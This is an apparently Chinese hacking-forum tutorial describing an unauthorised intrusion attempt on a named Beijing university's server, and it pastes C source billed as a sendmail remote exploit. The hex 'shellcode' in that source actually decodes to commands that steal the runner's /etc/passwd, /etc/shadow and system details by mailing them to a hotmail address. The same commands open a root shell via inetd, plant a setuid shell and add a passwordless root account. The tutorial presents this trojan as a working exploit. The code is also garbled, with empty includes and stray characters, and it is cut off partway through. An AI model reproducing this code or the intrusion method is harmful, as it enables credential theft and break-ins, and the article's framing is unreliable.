作者:恶猫 E.S… 文章来源:邪恶八进制信息安全团队(www.eviloctal.com)
前言:
回想起当初,认识冰血到进入邪恶八进制做beginner版主, 到现在已经正正一年了.看到八进制在冰血的管理和领导下,蒸蒸日上,论坛里大家讨论的技术越来越有水平,大家的原创作品的水平也越来越接近专业安全, 自己心理也是十分高兴..但照顾小菜鸟”Hacking”的文章相对就少许多了,今天我来专门写一篇专门照顾菜鸟的文章,如果您已经是老鸟了,就不必看此篇文章了,因为此文是为菜鸟量身打造.文章思路借鉴了小路的<<黑客防线---主机外部的危险>>在此感谢小路在无私共享的黑客精神.好了,废话不多说了Let’s begin~~
正文:
北方工业大学是北京一所工科大学,当时答应过我一个朋友(不是女朋友呦~~~)争取在她毕业前拿下她学校(北方工业大学)的主页,后来我只对她学校的网站做了简单的踩点,竟然发现主机是Sun OS,这下还真有点难度,由于自己那时的水平有限,而且自己也有学业要忙,就把这件事暂时搁置了,后来半年多后她再次想我提起这件事,我决定好好帮她分析一下.于是我和我在那个学校的一位朋友也是一位同行,开始对这所学校展开了测试.我用X-Scan仔细扫描了一下这个站点,发现主机开放21,25,80端口其他端口没有开放,在看看网站是否存在脚本问题,晕,竟然网页都是静态的,没有动态页面,这个入侵带来了更大的困难.令人庆幸的是主机开放25端口,而且用邮件服务程序用的是sendmail,X-Scan扫描报告上显示具有sendmail由于版本过低,具有remote exploit的可能.于是我赶快在google中搜索了一下针对Sun OS的sendmail溢出程序,真不容易竟然被有找到了源码如下:
/*
###############################################################################
!!! PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE !!!
###############################################################################
~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
~|~?Sendmail <= 8.12.9 remote exploit?~|~
~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
by 0wN-U, ownu@ph4k3s.haxorznetwork.net
Exploit for new sendmail vulnerability - discovered again - by Michal Zalewski.
securityfocus link: http://www.securityfocus.com/archive/1/337839?
This exploit will work against sendmail <= 8.12.9 on Linux, *BSD and Solaris.
###>>> If everything is ok, you will find shell on target box, port 31337
NOTE: This exploit is very powerful, and only root can use it.
Have a nice time with this exploit ;-).
>>>>>>>>>>>> YOU SHOULD NOT HAVE THIS 0day SENDMAIL WAREZ!!!! <<<<<<<<<<<<<<<<
THIS IS VERY PRIVATE, DO NOT DISTRIBUTE!!!.
- props to l33tT(), r3t4rd, n0b0dy, gopulg-et and mebej (U-stupid-l4mer;-)
- drops to whitehats^H^H^H^Hsuckz ;-)))
###############################################################################
!!! PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE !!!
###############################################################################
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SMTPPORT 25
/*?improved tcp port (31337) bind shellcode */
char asmcode[]=
"x65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx22x20x3ex20x69x6ex66x6fx2ex70x68"
"x75x6ex3bx65x63x68x6fx20x24x55x53x45x52x20x24x4fx53"
"x54x59x50x45x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6e"
"x3bx65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2e"
"x70x68x75x6ex3bx75x6ex61x6dx65x20x2dx61x20x3ex3ex20"
"x69x6ex66x6fx2ex70x68x75x6ex3bx65x63x68x6fx20x22x2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx22"
"x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6ex3bx69x66x63"
"x6fx6ex66x69x67x20x3ex3ex20x69x6ex66x6fx2ex70x68x75"
"x6ex3bx65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6f"
"x2ex70x68x75x6ex3bx63x61x74x20x2fx65x74x63x2fx68x6f"
"x73x74x73x20x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6e"
"x3bx65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2e"
"x70x68x75x6ex3bx63x61x74x20x2fx65x74x63x2fx70x61x73"
"x73x77x64x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6ex3b"
"x65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2ex70"
"x68x75x6ex3bx63x61x74x20x2fx65x74x63x2fx73x68x61x64"
"x6fx77x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6ex3bx65"
"x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2ex70x68"
"x75x6ex3bx63x61x74x20x69x6ex66x6fx2ex70x68x75x6ex20"
"x7cx20x6dx61x69x6cx20x68x34x78x30x72x68x34x78x33x72"
"x40x68x6fx74x6dx61x69x6cx2ex63x6fx6dx3bx65x63x68x6f"
"x20x62x67x70x20x20x73x74x72x65x61x6dx20x20x74x63x70"
"x20x20x20x20x20x6ex6fx77x61x69x74x20x20x72x6fx6fx74"
"x20x20x20x20x2fx62x69x6ex2fx73x68x20x2fx62x69x6ex2f"
"x73x68x20x2dx69x20x3ex3ex20x2fx65x74x63x2fx69x6ex65"
"x74x64x2ex63x6fx6ex66x3bx6bx69x6cx6cx61x6cx6cx20x2d"
"x48x55x50x20x69x6ex65x74x64x3bx63x70x20x2fx62x69x6e"
"x2fx73x68x20x2fx74x6dx70x2fx2ex67x6fx74x69x74x2dx24"
"x55x53x45x52x3bx63x68x6dx6fx64x20x34x37x37x37x20x2f"
"x74x6dx70x2fx2ex67x6fx74x69x74x2dx24x55x53x45x52x3b"
"x65x63x68x6fx20x30x77x6ex75x3ax3ax30x3ax30x3ax30x77"
"x6ex75x3ax2fx72x6fx6fx74x3ax2fx62x69x6ex2fx73x68x20"
"x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64x3bx70x77"
"x63x6fx6ex76x3b";
int rev(int a){
? int i=1;
? if((*(char*)&i)) return(a);
? return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
char msg[] = "0day HACKING w4r3z!!!";
int main(int argc,char **argv){
?struct hostent *hp;
?struct sockaddr_in adr;
?char buffer[1024],*b,*ls = asmcode;
?int count;
?int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
?
?printf ("-------------------------------------------------------
");
?printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
");
?printf (" >>> SENDMAIL <= 8.12.9 REMOTE EXPLOIT by 0wN-U <<<
");
?printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
");
?printf ("-------------------------------------------------------
");
?
? if (getuid() != 0)
? {
??printf ("Sorry!!!
");
??printf ("This is very dangerous exploit for whole internet, and thats why only root users can use it!!!
");
??printf ("Sorry kiddies :-))))
");
??exit(0);
? }
? if(argc<2){
?? printf("USAGE: %s address portnum type
",argv[0]);
?? printf("address